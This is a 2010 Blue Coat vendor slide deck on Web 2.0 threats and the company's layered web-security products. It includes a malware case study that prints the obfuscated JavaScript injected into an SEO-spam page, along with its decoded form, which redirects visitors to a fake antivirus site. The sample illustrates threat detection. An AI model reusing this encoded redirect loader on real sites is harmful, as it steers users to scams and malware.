Upload
sophia-bice
View
232
Download
4
Tags:
Embed Size (px)
Citation preview
Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service names are the property of their respective owners.
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Living in a Web 2.0World(and howBCSI canhelp!)
Mark StanfordSE Manager
20110 Ashbrook Place, Suite 275Ashburn, VA 20147(703) 857-2100www.geobridge.net
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Agenda
Definition of Web 2.0 Overview Real World Web 2.0 application and threat examples BCSI countermeasures: Layered Security Defenses
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Applications& Services
Technologies & Programming Languages
Software &Systems
What is Web 2.0?
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Web Evolution
4
Interactive Pages
Community Model
Multi-Host Pages
Static Pages
Dynamic Pages
Publishing Model
Single Host Pages
Nice to Have Must Have
Dynamic Pages
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Cyber Crime Evolution
5
Invisible
Data Collection/Identity
Profit Driven
Wide-spread, Fast
Visible, DoS
Damage/Defacement
Ingenuity/Pride Driven
Amateurs Professionals
Targeted
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Web 2.0
Did NOT change…
the OSI model
the way IP addresses work
the way URLs are handled
the way Web Filtering works
DID change…
how information gets posted, even legitimate sites
how information may be presented
By 2012 the Internet will be 75X larger than in 2002
What is required to find/identify threats on the web
6
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Web 2.0 Also Means 1 URL Leads to Many
12 Domains, 130 URLs (www.cnn.com, 31.03.2010, 10:12 a.m. German Time)
12 Domains, 246 URLs(www.bild.de, 31.03.2010, 10:17 a.m. German Time)
7
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Web 2.0 and Search Engines
8
www Search Engine View
ForumsBlogsWikisGuestbooks
© Blue Coat Systems, Inc. 2010. All Rights Reserved.9
© Blue Coat Systems, Inc. 2010. All Rights Reserved.10
Malware Case Study
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
WebPulse saw a new referrer…
11
WebPulse
© Blue Coat Systems, Inc. 2010. All Rights Reserved.12
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Nothing here…
13
<html><head><title>Install Keys Satellite</title><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="robots" content="index, follow" /></head><body bgcolor=#59746>
<style>body { font-family: verdana; margin: 10px 100px;}</style><h3>Install Keys Satellite</h3><strong>install clear xbox controller</strong> <i>install remove lexus power window</i> audio install honda civic 2007 ex <i>install linux suse on new computer</i> <u>install electronic diary</u> install cs3 in vista <i>install warehouse shelving</i> <strong>hp deskjet 5550 install software</strong> valve relief chevy piston install <i>install patrol air filter</i> no install lock folders <b>how to install mailbox garage door</b> <font color=#9D17E style="font-size: 16px;">have vb setup install jmail</font> axle install hellwig ghetto install s forum apron front sink install <u>tiger wood install</u> <b>install cobra fatty freeway bars</b> plasma install <strong>adaptec tape install</strong> <font color=#7B6DAC style="font-size: 12px;">remote install software</font> cnps 9500 install install modular plug rj45 <strong>can't install program</strong> <font color=#68D71E size=14>how to install neon tubes</font> <i>how to install themes for mac</i> 2003 install microsoft office <i>msdos install system</i> <b>software install through active directory</b> install vcr to dish network <strong>nero startsmart install error</strong> <b>blat install syntax</b> <i>dell workstation 360n install cpu</i> install setup install tunnel protectors <u>project 2007 how to install</u> <font color=#D8B88A style="font-size: 18px;">self install fire pit</font> <strong>install grub dual boot</strong> <b>deluxe install prizm pro</b> <b>how to install a window shutter</b> <b>install laminate over existing counter top</b> <font color=#41FE63 style="font-size: 12px;">linksys 54g install</font>
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
So… How did the User get there?
14
© Blue Coat Systems, Inc. 2010. All Rights Reserved.15
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Interesting…
16
<html><head><title>Install Keys Satellite</title><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="robots" content="index, follow" /></head><body bgcolor=#59746><script language="javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%0D%0A%7D%0D%0A%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00tubcjmjuzjofutdbo/dpn0ijujo/qiq%264Gmboe%264E31%2637bggje%264E27%3A11%2633%264C%264D0tdsjqu%264F1');</script><style>body { font-family: verdana; margin: 10px 100px;}</style><h3>Install Keys Satellite</h3><strong>install clear xbox controller</strong> <i>install remove lexus power window</i> audio install honda civic 2007 ex <i>install linux suse on new computer</i> <u>install electronic diary</u> install cs3 in vista <i>install warehouse shelving</i> <strong>hp deskjet 5550 install software</strong> valve relief chevy piston install <i>install patrol air filter</i> no install lock folders <b>how to install mailbox garage door</b> <font color=#9D17E style="font-size:
<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1));var t=""; for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write (unescape(t));}</script>
<script>document.location="http://stabilityinetscan.com/hitin.php?land=20&affid=169";</script>
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
“A friendly piece of advice…”
17
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
“You are in trouble…”
18
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
“This is very serious”
19
© Blue Coat Systems, Inc. 2010. All Rights Reserved.20
© Blue Coat Systems, Inc. 2010. All Rights Reserved.21
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Web 2.0 Examples - Twitter
Still a toy or already a tool?
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Web 2.0 Examples - Mashups
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Web 2.0 Examples - Facebook
Still a toy or already a tool?
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Koobface worm (January 2009)
Invitation to click on a link in Facebook or Myspace in-box
Supposedly link to a funny video Users where told that they have to update their flash
player to view the video The installed SW was a proxy server Now selected traffic could be redirected to the attacker A second program to download and install arbitrary code
was installed, too
Like magic, the infected computer is now a zombie, under the control of unknown villains
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Changing Web Habits
26
Top 10 Categories – 2009WebFilter/WebPulse, 62M+ Users
1. Social Networking2. Web Advertisements3. Search Engines/Portals4. Personals/Dating5. Pornography6. Computers/Internet7. Audio/Video Clips8. Adult/Mature Content9. Web Email10. Illegal/Questionable
Social Networking Moved to #1 from #2 position Represents 25% of Top10 requests
Web Email Dropped to #9 from #5 position Users migrating to social networking
Cyber Crime Leverages Search engine poisoning Fake AV and Codec updates Popular site injections Death, Drama & Disaster lures Health & Wealth scams
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Layered Security Defenses
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Blue Coat Layered Defenses
Cloud ServiceWebPulse & WebFilter
Inline Threat DetectionProxyAV
Web Application & Content Controls ProxySG
Integrated Data Loss PreventionProxySG with 6 DLP partners
Remote Users ProxyClient
28
© Blue Coat Systems, Inc. 2010. All Rights Reserved.29
Hybrid Design
Architected to Deliver On-Demand Security Intelligence
WAN
Industry’s leading collaborative cloud defense with 62M usersReal-time inputs of any new web content and dynamic linksWeb protection, visibility, and reporting in any location
ProxySG & ProxyAV
WebFilter
WebPulse
ProxyClientRemote Users
Web Gateway Protection Inline threat analysis w/SSL Web filtering & content controls Media optimization + B/W Mgmt
Cloud Defenses Real-time web content ratings Web threat & malware detection Reputation ratings
URL Filtering & ReportingCloud threat protection
Reporter
Web
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Blue Coat Secure Web Gateway
30
MalwareScanning
ProtocolCompliance
ContentFilters
DataTypes
ActiveContent
`
URLFiltering
AAAPolicy
CertificateValidation
MethodControls
BCWF
WebPulse
Reporter
Log Files
ObjectCache
BandwidthManagement
ProtocolOptimization
ProxyAV:- Behavior based analysis- Signatures
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Preserve Productivity
BCWF Malware Identification StrategyDynamic Link Analysis
A. Popular Web Site Pointers
B. Middle Relay Servers & Link Farms
C. Malware Download Hosts
31
A B C
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Dynamic Link Analysis
Cloud connected community that is broad and diverse Real-time input of new web links to the cloud service Immediate analysis of URL chain for threats & rating Update master database in cloud to protect all members
32
Cloud Community
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Dynamic Link Analysis
Cloud connected community that is broad and diverseReal-time input of new web links to the cloud service Immediate analysis of URL for threats & rating Update master database in cloud to protect all members
33
Cloud Community
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Dynamic Link Analysis
Cloud connected community that is broad and diverse Real-time input of new web links to the cloud serviceImmediate analysis of URL for threats & rating Update master database in cloud to protect all members
34
Cloud Community
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Dynamic Link Analysis
Cloud connected community that is broad and diverse Real-time input of new web links to the cloud service Immediate analysis of URL for threats & ratingUpdate master database in cloud to protect all members
35
Cloud Community
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Dynamic Link Analysis
Cloud connected community that is broad and diverse Real-time input of new web links to the cloud service Immediate analysis of full link chain for threats & rating Update master database in cloud to protect all members
36
Protects
Web Gateways
Remote Users
Cloud Community
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
WebPulse: First Complete DLA solution
New defense layer Full Dynamic link analysis Foundation for next generation URL filtering Fast, Aware, Protective… for anyone, anywhere
37
Protects
Web Gateways
Remote Users
Cloud CommunityWebPulse62M Users
WebFilter2B reqs/week
ProxySG
ProxyClientK9
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
K-9 Web ProtectProxyClientProxySG ProxyAV
BCWF Full ListBCWF Full List
• 16 Sources• Signatures• Behavior • Heuristics • Reputation• Sandboxing
Threat Analysis
Deep Background Rating Analysis (DBRA)• 2 Secs – 2hrs• RTT Balanced
URL Malware
• “Uncategorized” sent to WebPulse for
Dynamic categorization • 62M+ User Community • 45B+ requests/week• Fully Configurable and Secure• 5 Min for security updates
Rating Servers• 300M Unique requests
daily• 1.2B requests “rated”
weekly• 50 languages• Fast (ms) – try it!
Real Time Boundary
WebPulse Clients
WebPulse Cloud Service
DynamicURL Cache
DynamicURL Cache
DynamicURL Cache
URL & Content Trainers
ANZ
Master Rating Database VA
CA
HK
UK
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
ProxyAV: Co-Processor Architecture
Improved utilization with M:N ratio Higher throughput per gateway Results in less hardware (with new AV HW: always 1 SG –
1 AV sizing possible)
Optimized design
39
EnterpriseNetwork
Internet
ProxySG
ProxyAV
Clean Object Cache
Finger Print Cache
Dual Cache Design
• Patience Page • Trickle First• Trickle Last • Defer Scan (media)
ICAP, ICAP+, S-ICAP
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
ProxyAV – anti-malware features
Don’t get confused by the name “AV” Anti-malware features are more comprehensive then
traditional pattern matching technologies• Behavioral analysis
• Sandboxing
• Heuristics
• True file type detection
• Etc.
ProxyAV vs. competitors: Aurora exploit (CVE-2010-0249)Note: Finjan was not able to block the exploit without a
security update
It is a different approach and philosophy
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
ProxyClient included with WebFilter
Remote Filtering Cloud Connected Threat Protection Acceleration Central Policy Reporting
41
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Why Blue Coat Products? Unmatched policy controls & authentication options Proactive Malware/MMC detection Real-time web content analysis/DLA for gateway & client URL database, threat detection, and DLP partners Custom object-based OS with patented cache
technologies Broad proxy library & acceleration techniques Bandwidth management & protocol
optimization/compliance Experience, Reliability, Performance
42
All the RIGHT parts!
Blue Coat Confidential Information
© Blue Coat Systems, Inc. 2010. All Rights Reserved.43
Questions?
© Blue Coat Systems, Inc. 2010. All Rights Reserved.